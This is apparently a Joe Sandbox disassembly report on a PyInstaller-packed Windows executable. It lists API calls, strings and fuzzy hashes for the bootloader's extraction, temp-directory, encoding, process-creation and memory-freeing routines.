                                                                                                                      • String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                      • API String ID: 0-666925554
                                                                                                                      • Opcode ID: 84c7c56ec003c0006220f5202060ebf03f1dac103cd222ddd43c5e16c525bf37
                                                                                                                      • Instruction ID: 96207dbf7a00217aa2da507d7a371771fc96c37ba47a9ff36addc99ef167012b
                                                                                                                      • Opcode Fuzzy Hash: 84c7c56ec003c0006220f5202060ebf03f1dac103cd222ddd43c5e16c525bf37
                                                                                                                      • Instruction Fuzzy Hash: AB4149B2E0030177EB20AE646C46B6B3655BBC0766F084625FF19562C2F775EB0CB293
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,00000000,?), ref: 00F5686E
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00F56875
                                                                                                                      • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 00F5688C
                                                                                                                      • GetLastError.KERNEL32 ref: 00F56896
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?,?,?,?,00F5142E,?,00000000,00F52AFF,?,?,?,?), ref: 00F568C5
                                                                                                                      • ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 00F568D6
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00F5142E,?,00000000,00F52AFF,?,?,?,?,00000000), ref: 00F568EE
                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?,00F5142E,?,00000000,00F52AFF,?,?,?,?,00000000), ref: 00F5691B
                                                                                                                      • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,?,?,00000001), ref: 00F5693F
                                                                                                                      • CreateDirectoryW.KERNEL32(?,?,?), ref: 00F5694E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                       • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                                                                                      • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                                                                                      • API String ID: 4998090-2855260032
                                                                                                                      • Opcode ID: 3d558238f5bbcad218a05df146b9678661422c7d866df12e05eba4deaa4dbde3
                                                                                                                      • Instruction ID: 366b5da641f052b7a0655d211586edbde62c037c87c26d97b55c3eede81fffbe
                                                                                                                      • Opcode Fuzzy Hash: 3d558238f5bbcad218a05df146b9678661422c7d866df12e05eba4deaa4dbde3
                                                                                                                      • Instruction Fuzzy Hash: AF31A271504315ABE720DF20DC49B9BBBE8EF48361F840919FA68D2191D774DA4CEBA3
                                                                                                                      APIs
                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 00F6A9BD
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A573
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A585
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A597
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A5A9
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A5BB
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A5CD
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A5DF
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A5F1
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A603
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A615
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A627
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A639
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A64B
                                                                                                                      • _free.LIBCMT ref: 00F6A9B2
                                                                                                                        • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
                                                                                                                        • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
                                                                                                                      • _free.LIBCMT ref: 00F6A9D4
                                                                                                                      • _free.LIBCMT ref: 00F6A9E9
                                                                                                                      • _free.LIBCMT ref: 00F6A9F4
                                                                                                                      • _free.LIBCMT ref: 00F6AA16
                                                                                                                      • _free.LIBCMT ref: 00F6AA29
                                                                                                                      • _free.LIBCMT ref: 00F6AA37
                                                                                                                      • _free.LIBCMT ref: 00F6AA42
                                                                                                                      • _free.LIBCMT ref: 00F6AA7A
                                                                                                                      • _free.LIBCMT ref: 00F6AA81
                                                                                                                      • _free.LIBCMT ref: 00F6AA9E
                                                                                                                      • _free.LIBCMT ref: 00F6AAB6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                       • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: 9e2d21f223b1bf30d39df4c90266986528b70c7ce6b36e366706a4ddff4833e0
• Instruction ID: e88cd75c6dfd204880a4730d51d68dcdc0daebf378c8f37d7e13b59bb38a45cb
• Opcode Fuzzy Hash: 9e2d21f223b1bf30d39df4c90266986528b70c7ce6b36e366706a4ddff4833e0
• Instruction Fuzzy Hash: E6313D31A00701DFEB21AA79DD46B6673F9EF40360F25442AE099E7162DF79BD80EB11
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 37834a7e49c7c2683572fd89d82a79cfd57187240c9370364524ab39d5d94135
• Instruction ID: 5e8c8626dd12c0caeb55a6d46a736fc720485e1b6ae1456b399be6d4d573e1fb
• Opcode Fuzzy Hash: 37834a7e49c7c2683572fd89d82a79cfd57187240c9370364524ab39d5d94135
• Instruction Fuzzy Hash: EB219676900108AFCB41EFA4CC82DEE7BB9EF48344F0041A6B6159B572DB75EB44DB80
APIs
• GetTempPathW.KERNEL32(00001000,?,?,?,?,?,00F55A66,?,00000000,?,pyi-runtime-tmpdir), ref: 00F55B1D
• GetCurrentProcessId.KERNEL32 ref: 00F55B23
  • Part of subcall function 00F55C60: GetEnvironmentVariableW.KERNEL32(00000000,?,00002000,?,00F52FD8,_MEIPASS2), ref: 00F55C96
  • Part of subcall function 00F55C60: ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,00002000,?,00F52FD8,_MEIPASS2), ref: 00F55CB2
  • Part of subcall function 00F5E365: _free.LIBCMT ref: 00F5E378
• SetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,TMP,00000000,?,?,?,?,?,00F5142E,?,00000000,00F52AFF,?,?), ref: 00F55BBC
Similarity
• API ID: Environment$Variable$CurrentExpandPathProcessStringsTemp_free
• String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
• API String ID: 2771213846-1116378104
• Opcode ID: b7bf23547188db4e522a5bf995c5c5adca4588be2d199e066606ee6521600048
• Instruction ID: d16658bbfa68dbafc81acae506a429a1a9cdd191604794c0d045671d2a34e217
• Opcode Fuzzy Hash: b7bf23547188db4e522a5bf995c5c5adca4588be2d199e066606ee6521600048
• Instruction Fuzzy Hash: 1C41D372A00B04B7E16076B05C4BF6F35989F85F53F440835FF45A7182FAA8AA0C72A7
APIs
  • Part of subcall function 00F56990: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,00F5246C,?,?,00000400,?,00000000,00000800), ref: 00F569A8
• ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000,?,00F5142E,?,00000000,00F52AFF,?,?,?,?,00000000), ref: 00F557E4
Strings
• LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00F557F9
• LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00F55855
• LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00F557B3
Similarity
• API ID: ByteCharEnvironmentExpandMultiStringsWide
• String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
• API String ID: 2001182103-3498232454
• Opcode ID: ab8cc7d22a54aa51b593dd03db8bfd601427cc10b7b3ff904aa7c5bba2a46241
• Instruction ID: 0775316f8e7b2361801366cbb119a9c9085e343a939174f261a955557ce3968e
• Opcode Fuzzy Hash: ab8cc7d22a54aa51b593dd03db8bfd601427cc10b7b3ff904aa7c5bba2a46241
• Instruction Fuzzy Hash: D2311CB2A406006BE6247374AC47FAB72989F84B12F440535FF09D7282F978E50C92D7
APIs
• GetDC.USER32(?), ref: 00F51E50
• SelectObject.GDI32(00000000,?), ref: 00F51EA0
• DrawTextW.USER32(00000000,?,000000FF,?,00002550), ref: 00F51EB5
• SelectObject.GDI32(00000000,00000000), ref: 00F51EC6
• ReleaseDC.USER32(?,00000000), ref: 00F51ECF
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,?,00000032,00000004), ref: 00F51F1C
• MoveWindow.USER32(?,?,?,?,00000014,00000001,?,?,?,?,?,?,?,00000032,00000004), ref: 00F51F4B
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,00000014,00000001), ref: 00F51F95
• MoveWindow.USER32(?,?,00000000,?,?,00000001,?,?,?,00000014,00000001), ref: 00F51FCA
Similarity
• API ID: MoveWindow$ObjectSelect$DrawReleaseText
• String ID:
• API String ID: 2147705588-0
• Opcode ID: a541af4a0bd3edb6ee3ccae4f94c33fe04acaef8439d3bec591122df70117b51
• Instruction ID: e3f4b86dfca041221862fb3933a24816087f14b65d557c3100a17000a34a8018
• Opcode Fuzzy Hash: a541af4a0bd3edb6ee3ccae4f94c33fe04acaef8439d3bec591122df70117b51
• Instruction Fuzzy Hash: 69418C71604310AFD724DF2DCC889BBB7E9FB88701F41052EF98AC2291E675AD44E761
APIs
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00F56709
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00F5673E
Strings
• Out of memory., xrefs: 00F56767
• Failed to get UTF-8 buffer size., xrefs: 00F56773
• Failed to encode wchar_t as UTF-8., xrefs: 00F56760
• WideCharToMultiByte, xrefs: 00F56778
• win32_utils_to_utf8, xrefs: 00F5676C
Similarity
• API ID: ByteCharMultiWide
• String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
• API String ID: 626452242-27947307
• Opcode ID: d15ff7dec77ee99a8b1c9b23cea78c0903954ee68d1e6b356f0b7d8cfa2df274
• Instruction ID: 3b749cbd0952adfff472b126a4938a46b6872cbf4caadd73a4212a003a757894
• Opcode Fuzzy Hash: d15ff7dec77ee99a8b1c9b23cea78c0903954ee68d1e6b356f0b7d8cfa2df274
• Instruction Fuzzy Hash: DF313C71644305ABDB106E64BC82F1677D4EB44B26F500536FF54EB2C0EAA5E90CA263
APIs
  • Part of subcall function 00F56990: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,00F5246C,?,?,00000400,?,00000000,00000800), ref: 00F569A8
  • Part of subcall function 00F60F12: SetConsoleCtrlHandler.KERNEL32(00F60B95,00000001,00F7EE98,00000018,00000003,00F7EEB8), ref: 00F6102A
  • Part of subcall function 00F60F12: GetLastError.KERNEL32 ref: 00F61044
• GetStartupInfoW.KERNEL32(?), ref: 00F5616B
• GetCommandLineW.KERNEL32(?,00000000,00000001,00000000,00000000,00000000,?,?), ref: 00F561FC
• CreateProcessW.KERNEL32(?,00000000), ref: 00F5620B
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F5621B
• GetExitCodeProcess.KERNEL32(?,00000000), ref: 00F56229
Similarity
• API ID: Process$ByteCharCodeCommandConsoleCreateCtrlErrorExitHandlerInfoLastLineMultiObjectSingleStartupWaitWide
• String ID: CreateProcessW$Error creating child process!
• API String ID: 1248179626-3524285272
• Opcode ID: 19799a9b8f928aa4837bc36d50b763cdeff8f77d1e4a50297e7cf5be1b7ba8e5
• Instruction ID: 07dea62a8891e7f97d8b8b6f8fcdbe468af907573e13a5ce9da34248cc774f38
• Opcode Fuzzy Hash: 19799a9b8f928aa4837bc36d50b763cdeff8f77d1e4a50297e7cf5be1b7ba8e5
• Instruction Fuzzy Hash: DB319370A08344ABEB10EFA0CC4AB4B77E8AF44705F504919B694961C2DBFDD558EB53
APIs
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,00F5663C,00F8DC48,?,00001000,?,?), ref: 00F56A4A
  • Part of subcall function 00F52290: GetLastError.KERNEL32(?,00000000), ref: 00F522AD
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,00000000,00F5663C,00F8DC48,?,00001000,?,?), ref: 00F56AAF
Strings
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
• API String ID: 1717984340-27947307
• Opcode ID: 6f52a251bf29f1bf449b33a4b3293576c740d20072ae93535e9e485171440620
• Instruction ID: fe01976edd1574eceb9f11c660a5b0c0080faa7e6646e9a9a67f5b95292af34c
• Opcode Fuzzy Hash: 6f52a251bf29f1bf449b33a4b3293576c740d20072ae93535e9e485171440620
• Instruction Fuzzy Hash: D401E137B45221B6DA6061697C06F8B3A99CB86F72F154222FF1CE62C0E190E90671A3
APIs
• _ValidateLocalCookies.LIBCMT ref: 00F5ADF7
• ___except_validate_context_record.LIBVCRUNTIME ref: 00F5ADFF
• _ValidateLocalCookies.LIBCMT ref: 00F5AE88
• __IsNonwritableInCurrentImage.LIBCMT ref: 00F5AEB3
• _ValidateLocalCookies.LIBCMT ref: 00F5AF08
Strings
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: bc6629a90984b088dfea3498b4301f573e68f9f55ff78c0580e79afcbc2f16e7
• Instruction ID: 25227c0d234729539fdd7d9042b3328721c1a038aee64d02ba9f913a7ff1b066
• Opcode Fuzzy Hash: bc6629a90984b088dfea3498b4301f573e68f9f55ff78c0580e79afcbc2f16e7
• Instruction Fuzzy Hash: AC41E330E002089BCF00DF69CC85A9EBBB1AF05325F148255EE185B352D735DA29EB92
APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,00000000,?,?), ref: 00F56B35
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00F56B66
Strings
• Failed to get wchar_t buffer size., xrefs: 00F56B9B
• Out of memory., xrefs: 00F56B8F
• win32_utils_from_utf8, xrefs: 00F56B94
• MultiByteToWideChar, xrefs: 00F56BA0
• Failed to decode wchar_t from UTF-8, xrefs: 00F56B88
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: ByteCharMultiWide
• String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
• API String ID: 626452242-876015163
• Opcode ID: 95718de30d3073db1f7eec85e98843929599eb2002b09e47a4c9a36acb02de40
• Instruction ID: 991e8fc00a0d3e23406f830713655dbb03e6d62a53b6a6bfcae64e0ee9683035
• Opcode Fuzzy Hash: 95718de30d3073db1f7eec85e98843929599eb2002b09e47a4c9a36acb02de40
• Instruction Fuzzy Hash: 08313E72A443057BD7106E54AC41F1A7BD4EB84722F84063AFF58E72C0E6B5D90CB653
APIs
  • Part of subcall function 00F6A6BD: _free.LIBCMT ref: 00F6A6E2
• _free.LIBCMT ref: 00F6A743
  • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
  • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
• _free.LIBCMT ref: 00F6A74E
• _free.LIBCMT ref: 00F6A759
• _free.LIBCMT ref: 00F6A7AD
• _free.LIBCMT ref: 00F6A7B8
• _free.LIBCMT ref: 00F6A7C3
• _free.LIBCMT ref: 00F6A7CE
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: b82a83029192d2ac4a41a466b2bc48d6a5028a36daab7583f2bc1eaf857da398
• Instruction ID: 8fc6fa305b51e44683b88a40dd04d519f63c6a23ae65a0e050bc05da06ccaf52
• Opcode Fuzzy Hash: b82a83029192d2ac4a41a466b2bc48d6a5028a36daab7583f2bc1eaf857da398
• Instruction Fuzzy Hash: D011FE71940B04FAD620BBB0CC47FDB77ECEF46700F444815B29ABA162DB6AB614AB51
APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,00F5246C,?,?,00000400,?,00000000,00000800), ref: 00F569A8
  • Part of subcall function 00F52290: GetLastError.KERNEL32(?,00000000), ref: 00F522AD
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,?,?,00F5246C,?,?,00000400,?,00000000,00000800), ref: 00F56A09
Strings
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
• API String ID: 1717984340-876015163
• Opcode ID: 2c3675797e2d5a051f0bdd890d8dab492bf35425fdd33ac874b4b0ce718b0c17
• Instruction ID: f6b8689687b20ebc945d1b9d33434f2a923bd80851c786a8e18e79a5d1098dfa
• Opcode Fuzzy Hash: 2c3675797e2d5a051f0bdd890d8dab492bf35425fdd33ac874b4b0ce718b0c17
• Instruction Fuzzy Hash: E7012237B8422237D66065657C06D8B7B948B91F73F054232FF2CE21C0E5A0C94A71E3
APIs
• GetLastError.KERNEL32(00F522E9,00000000,?,?,?,00000400,?,00000000,?), ref: 00F565D3
  • Part of subcall function 00F56A30: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,00F5663C,00F8DC48,?,00001000,?,?), ref: 00F56A4A
• FormatMessageW.KERNEL32(00001000,00000000,?,00000400,00000000,00001000,00000000,00F522E9,00000000,?,?,?,00000400,?,00000000,?), ref: 00F565F2
Strings
• FormatMessageW, xrefs: 00F56601
• No error messages generated., xrefs: 00F565FC
• PyInstaller: FormatMessageW failed., xrefs: 00F5660E
• PyInstaller: pyi_win32_utils_to_utf8 failed., xrefs: 00F5663F
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: ByteCharErrorFormatLastMessageMultiWide
• String ID: FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.
• API String ID: 1653872744-3268588819
• Opcode ID: 42593e158f0bc9da27985fb996c9089100ffdbc07e085c1daaa7614a98c21f87
• Instruction ID: 1f636125cce33de7bb2841f722e93ae9be730101c59c41b42e1ff931251e752b
• Opcode Fuzzy Hash: 42593e158f0bc9da27985fb996c9089100ffdbc07e085c1daaa7614a98c21f87
• Instruction Fuzzy Hash: 110188747443446BF61C97149C47BAA32D69F98B46F80841DBB0DCA1C2FAE49908E757
                                                                                                                      APIs
                                                                                                                      • GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 00F64E36
                                                                                                                      • __fassign.LIBCMT ref: 00F6501B
                                                                                                                      • __fassign.LIBCMT ref: 00F65038
• WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F65080
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F650C0
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F65168
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: FileWrite__fassign$ConsoleErrorLastOutput
• String ID:
• API String ID: 1735259414-0
• Opcode ID: 1a7edef9a2e473f89dde81f5d3efe6b78d59d84f00e00641ad273451c57e4397
• Instruction ID: ec4ae302011906a40fe076b6a8c749e50aa35ce109be9874808602e1185343b7
• Opcode Fuzzy Hash: 1a7edef9a2e473f89dde81f5d3efe6b78d59d84f00e00641ad273451c57e4397
• Instruction Fuzzy Hash: 3BC19C75D002589FCF15CFE8C880AEDBBB5AF09314F28416AE855FB242D631AE46DF60
APIs
• GetLastError.KERNEL32(?,?,00F5B228,00F5B05F,00F5A0C5), ref: 00F5B23F
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F5B24D
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F5B266
• SetLastError.KERNEL32(00000000,00F5B228,00F5B05F,00F5A0C5), ref: 00F5B2B8
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 76c167b015c32b378901a69e23af06eab384b079ac478070c3951f2d8805d3ec
• Instruction ID: 03de621223e499726134e827d4034e8e59c40bb8064c5b55b12ee0099b1d9d96
• Opcode Fuzzy Hash: 76c167b015c32b378901a69e23af06eab384b079ac478070c3951f2d8805d3ec
• Instruction Fuzzy Hash: E101B5329192156DE6162AB4BC95A6E3B54EB117B7F300229FF24451E1EF55480DB360
APIs
• GetModuleHandleW.KERNEL32(00000000,00000000,?,00000000,00000000,00F5218F,00000000,00000000,Failed to obtain/convert traceback!,?,?,?,00000000,00F52EDE,?,?), ref: 00F52013
• DialogBoxIndirectParamW.USER32(00000000,?,00000000,00F51D70,?), ref: 00F520CB
  • Part of subcall function 00F5E365: _free.LIBCMT ref: 00F5E378
• DeleteObject.GDI32(?), ref: 00F520FD
• DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000102), ref: 00F5210F
Strings
• Unhandled exception in script, xrefs: 00F5203C
